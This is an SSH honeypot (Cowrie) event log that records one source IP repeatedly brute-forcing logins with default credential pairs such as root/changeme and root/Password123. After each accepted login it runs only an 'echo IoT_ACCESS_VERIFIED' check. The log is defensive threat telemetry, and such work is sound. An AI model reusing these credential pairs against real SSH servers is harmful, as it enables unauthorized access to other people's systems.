{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:53.383724Z","src_ip":"212.227.235.229","session":"00e203a43913"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123","message":"login attempt [root/Password123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:28:54.747886Z","src_ip":"212.227.235.229","session":"00e203a43913"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:28:55.248226Z","src_ip":"212.227.235.229","session":"00e203a43913"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:28:55.249002Z","src_ip":"212.227.235.229","session":"00e203a43913"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:55.655044Z","src_ip":"212.227.235.229","session":"00e203a43913"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:55.656199Z","src_ip":"212.227.235.229","session":"00e203a43913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34172,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cf687df7e47","protocol":"ssh","message":"New connection: 212.227.235.229:34172 (1.2.3.4:22) [session: 4cf687df7e47]","sensor":"my-vps","timestamp":"2025-08-26T08:28:55.798763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:56.271659Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:56.272815Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme","message":"login attempt [root/changeme] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:28:59.266027Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:29:00.221426Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:29:00.222500Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:00.669169Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:00.670726Z","src_ip":"212.227.235.229","session":"4cf687df7e47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54608,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4f0b067adf2","protocol":"ssh","message":"New connection: 212.227.235.229:54608 (1.2.3.4:22) [session: a4f0b067adf2]","sensor":"my-vps","timestamp":"2025-08-26T08:29:00.770118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:01.526654Z","src_ip":"212.227.235.229","session":"a4f0b067adf2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:01.527416Z","src_ip":"212.227.235.229","session":"a4f0b067adf2"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-08-26T08:29:02.224836Z","src_ip":"212.227.235.229","session":"a4f0b067adf2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:04.455657Z","src_ip":"212.227.235.229","session":"a4f0b067adf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41328,"dst_ip":"1.2.3.4","dst_port":22,"session":"9baa942a5991","protocol":"ssh","message":"New connection: 212.227.235.229:41328 (1.2.3.4:22) [session: 9baa942a5991]","sensor":"my-vps","timestamp":"2025-08-26T08:29:04.548036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:04.983159Z","src_ip":"212.227.235.229","session":"9baa942a5991"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:04.984068Z","src_ip":"212.227.235.229","session":"9baa942a5991"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-08-26T08:29:08.389216Z","src_ip":"212.227.235.229","session":"9baa942a5991"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:09.777813Z","src_ip":"212.227.235.229","session":"9baa942a5991"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33576,"dst_ip":"1.2.3.4","dst_port":22,"session":"b54390d1e7cc","protocol":"ssh","message":"New connection: 212.227.235.229:33576 (1.2.3.4:22) [session: b54390d1e7cc]","sensor":"my-vps","timestamp":"2025-08-26T08:29:09.876734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:10.232059Z","src_ip":"212.227.235.229","session":"b54390d1e7cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:10.232745Z","src_ip":"212.227.235.229","session":"b54390d1e7cc"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T08:29:11.794984Z","src_ip":"212.227.235.229","session":"b54390d1e7cc"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:13.678085Z","src_ip":"212.227.235.229","session":"b54390d1e7cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49148,"dst_ip":"1.2.3.4","dst_port":22,"session":"51c3cdf5f5c3","protocol":"ssh","message":"New connection: 212.227.235.229:49148 (1.2.3.4:22) [session: 51c3cdf5f5c3]","sensor":"my-vps","timestamp":"2025-08-26T08:29:13.790722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:14.229240Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:14.230539Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.login.success","username":"root","password":"hacked","message":"login attempt [root/hacked] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:29:15.595946Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:29:16.068229Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:29:16.068962Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:16.406430Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:16.407640Z","src_ip":"212.227.235.229","session":"51c3cdf5f5c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59608,"dst_ip":"1.2.3.4","dst_port":22,"session":"c14a689b6311","protocol":"ssh","message":"New connection: 212.227.235.229:59608 (1.2.3.4:22) [session: c14a689b6311]","sensor":"my-vps","timestamp":"2025-08-26T08:29:16.494463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:16.826265Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:16.826939Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.login.success","username":"root","password":"scanner","message":"login attempt [root/scanner] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:29:18.973830Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:29:20.139890Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:29:20.140710Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:20.256901Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:20.258273Z","src_ip":"212.227.235.229","session":"c14a689b6311"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47380,"dst_ip":"1.2.3.4","dst_port":22,"session":"6773c4a15256","protocol":"ssh","message":"New connection: 212.227.235.229:47380 (1.2.3.4:22) [session: 6773c4a15256]","sensor":"my-vps","timestamp":"2025-08-26T08:29:20.354061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:20.533035Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:20.533675Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.login.success","username":"root","password":"1337","message":"login attempt [root/1337] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:29:23.480424Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:29:24.138087Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:29:24.138787Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:24.452835Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:24.453877Z","src_ip":"212.227.235.229","session":"6773c4a15256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36290,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd3d1035be2b","protocol":"ssh","message":"New connection: 212.227.235.229:36290 (1.2.3.4:22) [session: fd3d1035be2b]","sensor":"my-vps","timestamp":"2025-08-26T08:29:24.542298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:29:26.050836Z","src_ip":"212.227.235.229","session":"fd3d1035be2b"}
